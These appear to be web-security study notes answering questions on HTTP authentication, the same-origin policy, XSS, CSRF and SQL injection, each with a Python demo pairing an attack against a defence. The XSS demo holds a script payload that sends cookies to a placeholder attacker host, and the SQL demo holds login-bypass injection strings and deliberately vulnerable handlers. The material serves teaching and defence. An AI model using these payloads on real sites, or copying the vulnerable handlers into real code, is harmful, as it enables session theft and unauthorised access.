1. Describe the two authentication modes that HTTP supports.
HTTP supports the following two authentication modes:
- Basic authentication:
- Login/password based: the client sends `Authorization: Basic` followed by base64("login:password").
- The credentials are only base64-encoded, not encrypted; anyone who can read the traffic recovers the password unless the connection uses TLS.
- Credentials are sent on every request (the browser caches them for the realm and resends them automatically).
- Supported by nearly all servers and clients and thus widely used.
- Digest authentication:
- Server sends a fresh nonce in its `WWW-Authenticate` challenge.
- Client computes an MD5 hash over the login, realm, password, nonce, request method and URI.
- Client sends only that hash over the network; the password itself never leaves the client.
- Seldom used: it relies on MD5, forces the server to keep a password-equivalent hash rather than a properly salted one, and protects only the password, not the rest of the traffic, so TLS is needed anyway.
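The two header formats above, as an added example that is not part of the original notes: it builds a Basic header and shows how trivially it decodes, then builds a Digest response the way RFC 2617 specifies (no `qop`) and checks it the way a server would. The user, password, realm and nonce are constructed demo values.

```python
import base64
import hashlib
import secrets

# Constructed demo credentials and realm; not from the original notes.
USER = "alice"
PASSWORD = "s3cret"
REALM = "example"


def basic_header(user: str, password: str) -> str:
    """Authorization header value for Basic auth: base64("user:password").

    Base64 is an encoding, not encryption; anyone who sees the header
    recovers the password, and the browser resends it on every request.
    """
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def basic_decode(header: str) -> tuple[str, str]:
    """What an eavesdropper does with a captured Basic header."""
    scheme, token = header.split(" ", 1)
    if scheme != "Basic":
        raise ValueError("not a Basic header")
    user, password = base64.b64decode(token).decode().split(":", 1)
    return user, password


def _md5(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(user, realm, password, nonce, method, uri) -> str:
    """Digest auth response (RFC 2617 without qop):
    MD5(HA1 ":" nonce ":" HA2) with HA1 = MD5(user:realm:password)
    and HA2 = MD5(method:uri). Only this hash crosses the wire."""
    ha1 = _md5(f"{user}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def digest_header(user, realm, nonce, method, uri, response) -> str:
    return (f'Digest username="{user}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", response="{response}"')


def server_check_digest(user, nonce, method, uri, response) -> bool:
    """Server side: recompute from the stored HA1 and compare in constant time.
    The server must keep HA1 (a password equivalent) rather than a slow salted
    hash; one reason Digest is seldom used today."""
    stored_ha1 = _md5(f"{user}:{REALM}:{PASSWORD}")
    ha2 = _md5(f"{method}:{uri}")
    expected = _md5(f"{stored_ha1}:{nonce}:{ha2}")
    return secrets.compare_digest(expected, response)


def demo() -> dict:
    nonce = secrets.token_hex(8)   # server-chosen, fresh per challenge
    basic = basic_header(USER, PASSWORD)
    resp = digest_response(USER, REALM, PASSWORD, nonce, "GET", "/secret")
    digest = digest_header(USER, REALM, nonce, "GET", "/secret", resp)
    return {
        "basic": basic,
        "basic_leaks_password": basic_decode(basic)[1] == PASSWORD,
        "digest": digest,
        "digest_contains_password": PASSWORD in digest,
        "server_accepts": server_check_digest(USER, nonce, "GET", "/secret", resp),
        # the same response presented against a different nonce is rejected
        "replay_with_new_nonce": server_check_digest(USER, "other-nonce", "GET", "/secret", resp),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Run it and compare the two headers: the Basic one decodes straight back to `alice:s3cret`, while the Digest one carries a 32-hex-digit response that changes with every nonce. The constant-time comparison on the server side is a habit worth keeping even in a toy.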
The same-origin policy:
- It prevents a hostile script loaded into one page from reading or tampering with documents of other origins (their DOM, cookies, responses), for example other pages open in the same browser.
- It prevents a script from snooping on input typed into windows or frames that belong to other origins.
- It compares the origin of the document the script runs in with the origin of the resource the script tries to access; the URL the script file itself was fetched from does not matter, a script included from another host runs with the including page's origin.
- Its checks are very restrictive: scheme, host and port must all match, a difference in any one of them blocks access.
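The origin comparison, as an added example that is not part of the original notes: a URL is reduced to its (scheme, host, port) triple and two URLs are same-origin only when all three agree. Default ports for http and https are filled in, the hostnames and the `attacker.invalid` placeholder are constructed.

```python
from urllib.parse import urlsplit

# Default ports used when the URL carries none (assumption: only http/https handled).
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url: str) -> tuple[str, str, int]:
    """Reduce a URL to its origin triple (scheme, host, port).
    Path, query and fragment play no part in the same-origin decision."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    if not scheme or not host or port is None:
        raise ValueError(f"cannot derive an origin from {url!r}")
    return scheme, host, port


def same_origin(url_a: str, url_b: str) -> bool:
    """All three components must match; a single difference fails the check."""
    return origin(url_a) == origin(url_b)


def script_may_read(document_url: str, target_url: str) -> bool:
    """May a script running in the document at document_url read the DOM or
    response of target_url? The origin of the *document* that includes the
    script is what counts, not where the script file was fetched from."""
    return same_origin(document_url, target_url)


# Constructed cases: (document the script runs in, target, expected outcome)
CASES = [
    ("https://bank.example/account", "https://bank.example/transfer?x=1", True),   # path/query ignored
    ("https://bank.example/", "https://bank.example:443/", True),                  # default port
    ("http://bank.example/", "https://bank.example/", False),                      # scheme differs
    ("https://bank.example/", "https://bank.example:8443/", False),                # port differs
    ("https://bank.example/", "https://www.bank.example/", False),                 # host differs
    ("https://attacker.invalid/", "https://bank.example/", False),                 # another site
]


def run_cases() -> bool:
    """True when every constructed case matches the expected outcome."""
    return all(script_may_read(doc, target) == expected for doc, target, expected in CASES)


if __name__ == "__main__":
    for doc, target, _ in CASES:
        verdict = "allowed" if script_may_read(doc, target) else "blocked"
        print(f"{doc} -> {target}: {verdict}")
```

Note what is deliberately absent: there is no notion of "the same company" or "a subdomain of"; `www.bank.example` and `bank.example` are simply different origins, which is exactly the restrictiveness the notes describe.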
3. Describe how cross-site scripting attacks work in detail.
At the core of a traditional (reflected) XSS attack lies a vulnerable script on an otherwise trusted site: it reads input, typically a URL parameter or form field, and echoes it back into the page without first sanitising or escaping it. The attacker crafts a URL whose parameter contains HTML with a `<script>` element and lures the victim into opening it (a link in an e-mail, a forum post, an advert). The site echoes the payload, the victim's browser parses it as part of the trusted page and runs the script with that site's origin, so the same-origin policy offers no protection: the script can read the site's cookies and DOM, ship them to the attacker's server, or act on the site as the logged-in victim. In the stored variant the payload is saved on the server (a comment, a profile field) so that every later visitor runs it.
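The vulnerable echo beside its hardened form, as an added example that is not part of the original notes: a search handler that reflects the `q` parameter into HTML, once unchanged and once HTML-escaped, fed with a constructed cookie-stealing payload (`attacker.invalid` is a placeholder host).

```python
from html import escape
from urllib.parse import parse_qs, urlencode

# Constructed attacker payload: ships the victim's cookie to a host the
# attacker controls (attacker.invalid is a placeholder, not a real host).
PAYLOAD = '<script>new Image().src="https://attacker.invalid/?"+document.cookie</script>'
# The link the attacker sends the victim: /search?q=<url-encoded payload>
ATTACK_QUERY_STRING = urlencode({"q": PAYLOAD})


def _param(query_string: str, name: str) -> str:
    """First value of a query parameter, as a web framework would hand it over."""
    return parse_qs(query_string).get(name, [""])[0]


def vulnerable_search_page(query_string: str) -> str:
    """Deliberately vulnerable: echoes the 'q' parameter into the HTML unchanged,
    so the browser parses attacker-supplied markup as part of the trusted page
    and runs it in this site's origin."""
    q = _param(query_string, "q")
    return f"<h1>Results for: {q}</h1>"


def safe_search_page(query_string: str) -> str:
    """Hardened: HTML-escape untrusted data at the point where it is inserted
    into an HTML text context. The user still sees the search term, but
    '<' becomes '&lt;' and no element is created."""
    q = _param(query_string, "q")
    return f"<h1>Results for: {escape(q, quote=True)}</h1>"


def contains_script_element(page: str) -> bool:
    """Crude oracle for the demo: did a <script> tag survive into the output?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("attacker link: /search?" + ATTACK_QUERY_STRING)
    print("vulnerable :", vulnerable_search_page(ATTACK_QUERY_STRING))
    print("hardened   :", safe_search_page(ATTACK_QUERY_STRING))
```

Escaping is context-specific: `html.escape` is right for text between tags and inside quoted attributes, but data placed into a JavaScript string, a URL or a CSS value needs the escaping rules of that context instead.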
4. Describe how cross-site request forgery attacks work in detail.
A cross-site request forgery exploits the fact that the browser attaches a site's cookies to every request sent to that site, regardless of which page caused the request. No cookies are stolen. A user who is logged in to a good site (say a bank) visits a malicious page; that page contains a form, image or script that targets a state-changing endpoint on the bank (a transfer, a password or e-mail change) and submits it automatically. The browser sends the request with the victim's session cookie, so the bank receives a correctly authenticated request that it cannot distinguish from one the user made on purpose. The attacker never sees the response (the same-origin policy blocks that), but does not need to. The usual defence is a secret per-session token embedded in the site's own forms and checked on every state-changing request: the attacker's page cannot read it, again because of the same-origin policy. SameSite cookies and checking the Origin or Referer header add further layers.
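The forgery and the token defence as an added example, not part of the original notes: a minimal browser cookie jar, a toy bank, a page on `attacker.invalid` that auto-submits a transfer, and the same transfer with and without a per-session CSRF token check. Site names, users and balances are constructed.

```python
import secrets
from dataclasses import dataclass, field

BANK = "https://bank.example"   # constructed site, not a real host


@dataclass
class Request:
    method: str
    url: str
    page_origin: str              # origin of the page that caused the request
    form: dict
    cookies: dict = field(default_factory=dict)


class Browser:
    """Minimal cookie jar. The key point: cookies are chosen by the
    destination site alone, regardless of which page started the request."""

    def __init__(self) -> None:
        self.jar: dict[str, dict[str, str]] = {}

    def set_cookie(self, site: str, name: str, value: str) -> None:
        self.jar.setdefault(site, {})[name] = value

    def submit(self, page_origin: str, site: str, path: str, form: dict) -> Request:
        return Request("POST", site + path, page_origin, form, dict(self.jar.get(site, {})))


class Bank:
    def __init__(self) -> None:
        self.sessions: dict[str, str] = {}      # session id -> user
        self.csrf_tokens: dict[str, str] = {}   # session id -> per-session secret
        self.balances = {"alice": 100, "mallory": 0}

    def login(self, browser: Browser, user: str) -> None:
        sid = secrets.token_hex(16)
        self.sessions[sid] = user
        self.csrf_tokens[sid] = secrets.token_hex(16)
        browser.set_cookie(BANK, "session", sid)

    def transfer_form_token(self, browser: Browser) -> str:
        """Embedded in the bank's own transfer form. An attacker's page cannot
        read it: the same-origin policy stops it from reading bank responses."""
        return self.csrf_tokens[browser.jar[BANK]["session"]]

    def transfer(self, req: Request, require_token: bool) -> str:
        user = self.sessions.get(req.cookies.get("session", ""))
        if user is None:
            return "401 not logged in"
        if require_token:
            expected = self.csrf_tokens[req.cookies["session"]]
            if not secrets.compare_digest(req.form.get("csrf", ""), expected):
                return "403 missing or wrong CSRF token"
        amount = int(req.form["amount"])
        self.balances[user] -= amount
        self.balances[req.form["to"]] = self.balances.get(req.form["to"], 0) + amount
        return "200 transfer done"


def forged_transfer(require_token: bool) -> tuple[str, int]:
    """Alice logs in, then visits attacker.invalid, whose page auto-submits a
    form to the bank. Nothing is stolen; the browser adds Alice's cookie."""
    browser, bank = Browser(), Bank()
    bank.login(browser, "alice")
    req = browser.submit("https://attacker.invalid", BANK, "/transfer",
                         {"to": "mallory", "amount": "100"})
    return bank.transfer(req, require_token), bank.balances["alice"]


def legitimate_transfer() -> tuple[str, int]:
    """The bank's own page submits the form together with the session's token."""
    browser, bank = Browser(), Bank()
    bank.login(browser, "alice")
    req = browser.submit(BANK, BANK, "/transfer",
                         {"to": "mallory", "amount": "30",
                          "csrf": bank.transfer_form_token(browser)})
    return bank.transfer(req, True), bank.balances["alice"]


if __name__ == "__main__":
    print("no token check :", forged_transfer(False))
    print("token required :", forged_transfer(True))
    print("legitimate     :", legitimate_transfer())
```

The forged request carries a valid session cookie and the bank has no way to tell who initiated it; only the token, which lives in a response the attacker's page cannot read, separates the two cases.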
5. What are the differences between cross-site scripting and cross-site request forgery.
Cross-site request forgery abuses the trust a server places in the user's browser: the request arrives with valid credentials (the session cookie), but the user never intended to send it, so the server must not treat "authenticated" as "intended". Cross-site scripting abuses the trust a user's browser places in a site: the injected script is served from the trusted origin and runs with that origin's privileges, so the client must not assume that everything the server sends is the server's own content. In practice XSS runs attacker-chosen code in the victim's browser and can read data from the site, whereas CSRF only lets the attacker send a request whose response it never sees. A site vulnerable to XSS is also vulnerable to CSRF, because the injected script can read the anti-CSRF token and make the request itself.
6. Describe the main characteristics of SQL injection and give 2 ways in which they can be prevented.
- Browser (or any other client) sends malicious input to the server, for example `' OR '1'='1` in a login form.
- Bad input validation and sanitisation on the server: the input is concatenated into an SQL string, so it changes the structure of the query instead of being treated as a data value. Depending on the query and database this bypasses authentication, reads or modifies other tables, or runs database commands.
Two ways in which they can be prevented are:
- Using parameterised queries (prepared statements): the query text is fixed and the user input is passed separately as a value, so it can never be parsed as SQL.
- Validating and sanitising input against an allowlist (expected type, length, character set) before it reaches the database, as defence in depth rather than as the only protection.
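Both the injection and the two preventions, as an added example that is not part of the original notes: a login check against an in-memory SQLite table built by string concatenation, the same check with bound parameters, and an allowlist validator for the username. The table rows, passwords and the username allowlist are constructed for the demo.

```python
import re
import sqlite3

# Allowlist for usernames; an assumption chosen for this demo.
USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Deliberately vulnerable: concatenation lets input become part of the SQL."""
    sql = f"SELECT 1 FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Prevention 1: the query text is fixed; values travel separately and are
    never parsed as SQL, whatever characters they contain."""
    sql = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


def valid_username(name: str) -> bool:
    """Prevention 2: allowlist validation of the input's shape. Defence in depth,
    not a substitute for parameters: passwords legitimately contain quotes."""
    return USERNAME_RE.fullmatch(name) is not None


TAUTOLOGY = "' OR '1'='1"   # turns WHERE ... AND password = '' OR '1'='1' into always-true
COMMENT_OUT = "alice'--"    # closes the name literal and comments out the password check


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_tautology_bypass": login_vulnerable(conn, "nobody", TAUTOLOGY),
        "vulnerable_comment_bypass": login_vulnerable(conn, COMMENT_OUT, "wrong"),
        "parameterized_tautology": login_parameterized(conn, "nobody", TAUTOLOGY),
        "parameterized_comment": login_parameterized(conn, COMMENT_OUT, "wrong"),
        "parameterized_real_login": login_parameterized(conn, "alice", "correct horse"),
        "tautology_passes_allowlist": valid_username(TAUTOLOGY),
        "comment_passes_allowlist": valid_username(COMMENT_OUT),
        "alice_passes_allowlist": valid_username("alice"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Printing the concatenated string in `login_vulnerable` for the two payloads makes the mechanism obvious: `AND` binds tighter than `OR`, so the tautology makes the whole condition true, and `--` discards everything after the name.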